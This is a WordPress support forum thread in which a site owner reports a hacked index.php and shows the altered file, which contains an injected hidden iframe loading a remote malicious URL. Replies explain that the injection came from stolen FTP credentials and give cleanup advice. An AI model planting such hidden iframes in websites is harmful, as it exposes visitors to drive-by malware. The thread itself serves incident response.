Title: Website hack
Last modified: August 19, 2016

---

# Website hack

 *  [nazcar](https://wordpress.org/support/users/nazcar/)
 * (@nazcar)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/site-hack/)
 * Two of my wordpress self hosted blogs were hacked. The index.php file was altered.
   Did anyone experience this?
 * Original:
 *     ```
       <?php
       /**
        * Front to the WordPress application. This file doesn't do anything, but loads
        * wp-blog-header.php which does and tells WordPress to load the theme.
        *
        * @package WordPress
        */
   
       /**
        * Tells WordPress to load the WordPress theme and output it.
        *
        * @var bool
        */
       define('WP_USE_THEMES', true);
   
       /** Loads the WordPress Environment and Template */
       require('./wp-blog-header.php');
       ?>
       ```
   
 *     ```
       <?php
       /**
        * Front to the WordPress application. This file doesn't do anything, but loads
        * wp-blog-header.php which does and tells WordPress to load the theme.
        *
        * @package WordPress
        */
   
       /**
        * Tells WordPress to load the WordPress theme and output it.
        *
        * @var bool
        */
       define('WP_USE_THEMES', true);
   
       /** Loads the WordPress Environment and Template */
       require('./wp-blog-
       <iframe src="http://u1w.in:8080/ts/in.cgi?pepsi112" width=125 height=125 style="visibility: hidden"></iframe>
       ```
   
 * My blogs are working fine now.
    How to increase the security so it wont be altered/
   hacked again? My previous permission was 644 then I changed it now to 444.

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/site-hack/#post-1152794)
 * [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
 *  Thread Starter [nazcar](https://wordpress.org/support/users/nazcar/)
 * (@nazcar)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/site-hack/#post-1153033)
 * thanks. the reason i am not upgrading is because of my plugins are not updated
   or may not be supported in the latest wp update. I guess I’ll sacrifice those
   plugins for now because of these attacks.
 *  [UseShots](https://wordpress.org/support/users/useshots/)
 * (@useshots)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/site-hack/#post-1153047)
 * Hardening WordPress is a good this. Unfortunately, it won’t help in this particular
   case.
 * This iframe is injected using FTP credential stolen from your local computer.
 * So make sure to scan your computer for malware.
    Once you are sure your computer
   is clean, change FTP passwords. And don’t save passwords inside your FTP program
   if you don’t want them to be stolen again.
 * Here you can find more information about this attack:
    [http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/](http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/)

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Website hack’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 3 participants
 * Last reply from: [UseShots](https://wordpress.org/support/users/useshots/)
 * Last activity: [16 years, 9 months ago](https://wordpress.org/support/topic/site-hack/#post-1153047)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics